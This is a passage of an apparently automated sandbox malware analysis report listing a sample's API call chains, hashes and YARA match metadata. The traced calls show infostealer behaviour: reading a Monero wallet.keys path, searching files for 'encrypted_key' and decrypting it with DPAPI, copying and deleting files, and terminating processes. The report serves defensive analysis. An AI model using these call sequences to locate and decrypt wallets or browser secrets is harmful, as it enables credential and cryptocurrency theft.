                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                    • Part of subcall function 00888B60: GetSystemTime.KERNEL32(00890E1A,015D9C18,008905AE,?,?,008713F9,?,0000001A,00890E1A,00000000,?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 00888B86
                    • Part of subcall function 0088A920: lstrcpy.KERNEL32(00000000,?), ref: 0088A972
                    • Part of subcall function 0088A920: lstrcat.KERNEL32(00000000), ref: 0088A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0087D801
                  • lstrlen.KERNEL32(00000000), ref: 0087D99F
                  • lstrlen.KERNEL32(00000000), ref: 0087D9B3
                  • DeleteFileA.KERNEL32(00000000), ref: 0087DA32
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: f31f588e788cf0f62e09aebd580d6aa737461cdac4861869cec050b8887f63c8
                  • Instruction ID: 09fcaefff35a94f5064fb24ddd0edfacd3503754b87e04cfe89bb240581d773d
                  • Opcode Fuzzy Hash: f31f588e788cf0f62e09aebd580d6aa737461cdac4861869cec050b8887f63c8
                  • Instruction Fuzzy Hash: BF81CE719101149AEB08FBA8DD96DEE7738FF54300F50456AF516E60E2EF386A09CB63
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen
                  • String ID:
                  • API String ID: 367037083-0
                  • Opcode ID: 408cedd754dc3021cc14a3fd22865a6c0c245190b6d8a861c090e0dbe3df7f08
                  • Instruction ID: 7616f12b8791aa2b476a68452afb46f9de8d3a82e72c203994f7ea152ef523bb
                  • Opcode Fuzzy Hash: 408cedd754dc3021cc14a3fd22865a6c0c245190b6d8a861c090e0dbe3df7f08
                  • Instruction Fuzzy Hash: 03414171D10109AFDB08FFE8D885AEE7774FF54704F048419E411A6291EB346A05DFA2
                  APIs
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                    • Part of subcall function 008799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008799EC
                    • Part of subcall function 008799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00879A11
                    • Part of subcall function 008799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00879A31
                    • Part of subcall function 008799C0: ReadFile.KERNEL32(000000FF,?,00000000,0087148F,00000000), ref: 00879A5A
                    • Part of subcall function 008799C0: LocalFree.KERNEL32(0087148F), ref: 00879A90
                    • Part of subcall function 008799C0: CloseHandle.KERNEL32(000000FF), ref: 00879A9A
                    • Part of subcall function 00888E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00888E52
                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00879D39
                    • Part of subcall function 00879AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00874EEE,00000000,00000000), ref: 00879AEF
                    • Part of subcall function 00879AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00874EEE,00000000,?), ref: 00879B01
                    • Part of subcall function 00879AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00874EEE,00000000,00000000), ref: 00879B2A
                    • Part of subcall function 00879AC0: LocalFree.KERNEL32(?,?,?,?,00874EEE,00000000,?), ref: 00879B3F
                    • Part of subcall function 00879B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00879B84
                    • Part of subcall function 00879B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00879BA3
                    • Part of subcall function 00879B60: LocalFree.KERNEL32(?), ref: 00879BD3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                  • String ID: $"encrypted_key":"$DPAPI
                  • API String ID: 2100535398-738592651
                  • Opcode ID: d8579b5a04a46ef71217583e611ba834529920275907eb69d3a6dffa57e7f7ae
                  • Instruction ID: b69195e3b906309bffdf7d2c29273758818b486771662e26b8ff4cbfc3d361af
                  • Opcode Fuzzy Hash: d8579b5a04a46ef71217583e611ba834529920275907eb69d3a6dffa57e7f7ae
                  • Instruction Fuzzy Hash: BA313275D10109ABCF14EBE8DC85AEEB7B8FB48304F148519E915E7245FB34DA04CBA1
                  APIs
                  • memset.MSVCRT ref: 008894EB
                    • Part of subcall function 00888D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0088951E,00000000), ref: 00888D5B
                    • Part of subcall function 00888D50: RtlAllocateHeap.NTDLL(00000000), ref: 00888D62
                    • Part of subcall function 00888D50: wsprintfW.USER32 ref: 00888D78
                  • OpenProcess.KERNEL32(00001001,00000000,?), ref: 008895AB
                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 008895C9
                  • CloseHandle.KERNEL32(00000000), ref: 008895D6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                  • String ID:
                  • API String ID: 3729781310-0
                  • Opcode ID: a4e44a8757ed7cd68e90117393113621e6964237238f5fab2854ca1b4514d810
                  • Instruction ID: 72e5afab6e53c2310db4f87e655fd1e9a2da61d49d2f924453623ae707094bd4
                  • Opcode Fuzzy Hash: a4e44a8757ed7cd68e90117393113621e6964237238f5fab2854ca1b4514d810
                  • Instruction Fuzzy Hash: 23313A71A0020CAFDB14EBE4CC49BEDB778FB58300F104559E506AB595DB74AA89CB52
                  APIs
                  • CreateFileA.KERNEL32(00883AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00883AEE,?), ref: 008892FC
                  • GetFileSizeEx.KERNEL32(000000FF,00883AEE), ref: 00889319
                  • CloseHandle.KERNEL32(000000FF), ref: 00889327
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateHandleSize
                  • String ID:
                  • API String ID: 1378416451-0
                  • Opcode ID: a45299a96a28b7b8bf732cf384a5355922666e0d51f23b07197da246b3eb3b1d
                  • Instruction ID: dbd69939f811c7d3081767177a080f34cdc152296c62cd108d0772acb34179ef
                  • Opcode Fuzzy Hash: a45299a96a28b7b8bf732cf384a5355922666e0d51f23b07197da246b3eb3b1d
                  • Instruction Fuzzy Hash: B4F03C75E44208BBDB10EBF0DC49BAE77B9FB58710F108294F651E72D0DA7096418B80
                  APIs
                  • __getptd.LIBCMT ref: 0088C74E
                    • Part of subcall function 0088BF9F: __amsg_exit.LIBCMT ref: 0088BFAF
                  • __getptd.LIBCMT ref: 0088C765
                  • __amsg_exit.LIBCMT ref: 0088C773
                  • __updatetlocinfoEx_nolock.LIBCMT ref: 0088C797
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                  • String ID:
                  • API String ID: 300741435-0
                  • Opcode ID: 58b34eb31c0082b668f4b4d87ae4c70d3ebe5927d4e6533a01f88e6d21989474
                  • Instruction ID: 34b34d93acb09fb7e93480e85e927c7048b4a62cfb83e1465d25770db34266c2
                  • Opcode Fuzzy Hash: 58b34eb31c0082b668f4b4d87ae4c70d3ebe5927d4e6533a01f88e6d21989474
                  • Instruction Fuzzy Hash: 12F09A329056109BE724BBBC9807B4E33A0FF40724F24414AF614E62D6DF7869409FAB
                  APIs
                    • Part of subcall function 00888DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00888E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00884F7A
                  • lstrcat.KERNEL32(?,00891070), ref: 00884F97
                  • lstrcat.KERNEL32(?,015D8A30), ref: 00884FAB
                  • lstrcat.KERNEL32(?,00891074), ref: 00884FBD
                    • Part of subcall function 00884910: wsprintfA.USER32 ref: 0088492C
                    • Part of subcall function 00884910: FindFirstFileA.KERNEL32(?,?), ref: 00884943
                    • Part of subcall function 00884910: StrCmpCA.SHLWAPI(?,00890FDC), ref: 00884971
                    • Part of subcall function 00884910: StrCmpCA.SHLWAPI(?,00890FE0), ref: 00884987
                    • Part of subcall function 00884910: FindNextFileA.KERNEL32(000000FF,?), ref: 00884B7D
                    • Part of subcall function 00884910: FindClose.KERNEL32(000000FF), ref: 00884B92
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                  • String ID:
                  • API String ID: 2667927680-0
                  • Opcode ID: e8850c9201085666355f31a823de7d9c2381592e2922280a1a6fa38b5a98fd82
                  • Instruction ID: 416a03eaf08dba007089e310b8e4adb585d1aa825ef77594e47cf86efc32a53e
                  • Opcode Fuzzy Hash: e8850c9201085666355f31a823de7d9c2381592e2922280a1a6fa38b5a98fd82
                  • Instruction Fuzzy Hash: 0A21B876900204ABCB54F7E4DC46EE9337CF764300F404694B659D2592EE759BC98B93